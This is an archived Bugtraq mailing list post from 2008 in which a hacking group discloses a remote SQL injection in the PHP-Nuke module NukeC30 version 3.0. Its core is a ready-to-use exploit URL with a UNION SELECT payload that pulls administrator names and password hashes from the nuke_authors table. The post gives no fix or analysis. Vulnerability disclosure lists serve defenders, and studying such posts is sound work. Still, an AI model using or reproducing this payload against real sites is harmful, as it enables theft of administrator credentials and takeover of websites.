Bugtraq mailing list archives
PHP-Nuke Module NukeC30 sql injection
From: houssamix () hotmail fr
Date: 11 Mar 2008 12:22:18 -0000
------------------------------------------------------------- ----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo -------- ------------------------------------------------------------- = Author : HouSSaMix from H-T Team = Script : PHP-Nuke Module NukeC30 Module's Name: NukeC30 Module's Version: 3.0 = BUG : Remote SQL Injection = Exploit : http://Target/[path]/modules.php?name=NukeC30&op=ViewCatg&id_catg=[SQL] [SQL]= -1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/*where%20admin%20-2 = Greetz : All muslims HaCkers
Current thread:
- PHP-Nuke Module NukeC30 sql injection houssamix (Mar 11)
- <Possible follow-ups>
- Re: PHP-Nuke Module NukeC30 sql injection my_msn_my_msn_my (Mar 13)